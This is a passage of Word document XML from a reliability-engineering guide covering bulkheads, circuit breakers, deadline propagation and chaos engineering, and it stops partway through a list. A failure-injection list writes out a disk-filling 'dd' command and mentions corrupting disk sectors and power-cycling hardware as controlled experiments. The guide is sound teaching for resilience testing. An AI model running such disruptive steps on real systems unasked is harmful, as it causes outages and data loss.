    <w:p w14:paraId="028A8937" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → User Profile, Inventory, General pools are unaffected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BEB99B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → Those services continue at full capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE332C0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve">  → Blast radius: Payment Service only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491EA626" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Semaphore bulkheads vs thread pool bulkheads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D8D4B3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Thread pool bulkhead:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Maintains a dedicated thread pool per downstream service. Requests to a downstream are dispatched to that pool's threads. If the pool is exhausted, new requests are rejected immediately (fail-fast) without consuming the main thread pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1464A927" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Semaphore bulkhead:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t xml:space="preserve"> Uses a counting semaphore to limit concurrent calls per downstream. The calling thread acquires the semaphore before calling the downstream, </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>releases it after. If the semaphore count is exhausted, the calling thread is rejected immediately. Simpler but the calling thread is still consumed while waiting — still a resource drain, just bounded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B9F3A3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Thread pool bulkheads are generally superior</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> for I/O-bound downstream calls because the caller thread is not blocked — it can serve other requests while the downstream call runs in the pool's thread. Semaphore bulkheads are better for CPU-bound local computation limits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC4B671" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sizing bulkheads:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Too small → legitimate traffic is rejected. Too large → bulkhead doesn't actually limit blast radius. Sizing is empirical — measure 99th percentile concurrent calls per downstream during peak load. Set the bulkhead to 150% of that (headroom for spikes). Monitor bulkhead rejection rate — sustained rejections indicate the downstream is degraded, not that the bulkhead is too small.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4197DB34" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Circuit Breaker — State Machine Deep Dive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C11EAC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>The circuit breaker's power is its </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>adaptive response to failure</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>. Unlike static timeouts (which wait the full duration every time), the circuit breaker accumulates failure evidence and </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>preemptively stops calling a failing downstream</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>, eliminating timeout latency entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C2A2F3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The internal sliding window for failure tracking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F1FE7F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Modern circuit breakers (Resilience4j, Envoy's outlier detection) use two window types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBD2D25" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Count-based sliding window:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Track the last N calls regardless of time. If the last 100 calls have a 60% failure rate, trip the circuit. Problem: if calls are infrequent, the window covers many minutes — slow to detect sustained failure, slow to recover detection after failure ends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4779D608" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Time-based sliding window:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Track calls in the last N seconds. If calls in the last 10 seconds have a 60% failure rate, trip the circuit. Problem: if calls are very frequent (10,000/sec), the window contains enormous amounts of data — memory-intensive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2814D8D5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hybrid approach:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Track calls in a fixed-size ring buffer of time buckets. Each bucket covers 1 second. The window tracks the last 10 buckets (10 seconds). New calls increment the current bucket's counters. Old buckets (outside the 10-second window) are evicted from the ring. This is O(1) per call update, O(W) space (W = window size in buckets), and accurately represents recent failure rates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CF3ABF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Half-open state mechanics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230D8349" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>The half-open state is where circuit breaker reliability engineering gets subtle. Too aggressive → the circuit re-opens on the first test failure, taking much longer to recover than necessary. Too lenient → the circuit closes on a single success from a still-failing downstream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58724F73" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configurable half-open parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345ED701" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="372"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>permittedNumberOfCallsInHalfOpenState: Allow N test calls before deciding to close or re-open. Averages N outcomes rather than deciding on 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356B0E3E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="372"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>slowCallRateThreshold: In half-open state, if slow calls (exceeding slowCallDurationThreshold) exceed this percentage, re-open the circuit — the downstream is responding but too slowly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670E21EF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="372"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>failureRateThreshold: If failures in half-open state exceed this percentage, re-open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2438BD9F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Circuit breaker metrics to monitor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCF308A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="373"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>circuit_breaker_state (CLOSED/OPEN/HALF_OPEN): Alert on any transitions to OPEN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A85E551" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="373"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>circuit_breaker_calls_not_permitted_total: Rate of calls rejected by open circuit. Sustained high rate = downstream is persistently failing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBB1D55" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="373"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>circuit_breaker_failure_rate: Current failure rate within the sliding window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E61159A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="373"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>circuit_breaker_slow_call_rate: Rate of slow calls. Leading indicator — rises before failure rate does when a downstream is degrading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8698F9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Timeout Hierarchy and Deadline Propagation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA7751B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Every network call must have a timeout. But the timeout must be calibrated to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>actual distribution of response times</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> for that call, not an arbitrary default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46444EF8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Calibrating timeouts to latency distributions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459668D8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Measure the p99.9 latency of the downstream call. Set the timeout to </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2× the p99.9 latency</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (generous enough not to time out healthy responses, aggressive enough to cut off truly hung calls). Do this per-endpoint, not globally — a database query timeout may be 500ms, a file upload timeout may be 60 seconds, a health check timeout may be 50ms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3640FDC3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The cascading timeout problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7653ECC4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAF0D9F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Service A (timeout: 10s) → Service B (timeout: 10s) → Service C (timeout: 10s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AA4E53" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>If Service C hangs, Service B waits up to 10s, then times out. Service A waits up to 10s for B's response, then times out. Total latency from client's perspective: 20+ seconds. With 10 services chained: 100+ second latency before the client receives an error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8B9D85" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deadline propagation solves this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6926C936" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>When Service A receives a request with a 3-second deadline (time remaining before the client's timeout), it subtracts its own processing overhead and forwards the </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>remaining deadline</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> to Service B. Service B forwards the remaining deadline to Service C. If at any point the remaining deadline is less than the minimum time needed to execute, the service immediately returns an error rather than attempting the operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10020AEA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gRPC deadline propagation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> gRPC propagates deadlines natively via the grpc-timeout header. The framework automatically cancels in-flight RPCs when the deadline expires — no application code needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396974DF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implementation for non-gRPC systems:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Add a X-Request-Deadline header (Unix timestamp). Each service reads this, computes remaining time, uses it as its timeout for downstream calls, and propagates it forward. Add middleware that rejects requests where the remaining deadline is below a minimum threshold (e.g., 50ms — not enough time to do anything useful).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB55BE4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="35652C32">
          <v:rect id="_x0000_i2787" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5192FB3D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Testing for Reliability — Beyond Unit Tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBD42F5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Reliability engineering requires testing failure modes — not just success paths. Standard unit and integration tests rarely cover failures, and reliability testing is categorically different from functional testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBE64C8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chaos Engineering — Full Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2D13D6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Chaos Engineering Principle (Netflix Simian Army origin):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485EE803" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>In 2011, Netflix was moving to AWS and discovered that their disaster recovery procedures existed only on paper — they'd never been tested. They created </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chaos Monkey</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> to solve this: a service that randomly terminates EC2 instances </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>in production, during business hours</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t>. The philosophy: if failure will happen anyway (and it will), better to discover it during business hours with engineers at their desks than at 3am.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF78ACF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chaos Engineering is not random destruction.</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> It is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>scientific methodology:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62953197" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="374"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Define steady state:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> What does normal look like? Establish baseline metrics (RPS, error rate, p99 latency, revenue per minute). These are your experiment's control conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109C5A94" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="374"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hypothesize:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> "We believe that if we terminate one of the three Kafka brokers, the system will detect the failure within 30 seconds, automatically rebalance partitions, and continue processing messages with &lt;1% increase in error rate."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594BA8BF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="374"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Design the experiment:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Controlled termination of one broker. Duration: 10 minutes. Scope: 10% of traffic (canary). Abort conditions: error rate exceeds 5%, revenue drops more than 2%.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46957E14" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="374"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Inject the failure:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Terminate the broker. Monitor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7012A52C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="374"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Analyze:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Did the system behave as hypothesized? If yes — validated reliability for this failure mode. If no — you found a reliability gap. Fix it before this failure mode occurs naturally in production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16577602" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="374"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Widen scope:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Validated at 10% → run at 50% → run at 100%. Validated one broker → terminate two simultaneously. Validated during business hours → run at night.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3456E94B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Failure injection categories:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0540AF6D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Infrastructure failures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D969F86" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="375"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Terminate VM instances (EC2, GCE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367290A0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="375"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Fill disks to 100% (dd if=/dev/zero of=/tmp/fill).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642325C3" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="375"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Exhaust file descriptors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336C894D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="375"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Corrupt disk sectors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DC122E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="375"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Power cycle hardware (using IPMI).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B26C4A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Network failures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F13D35" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="376"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
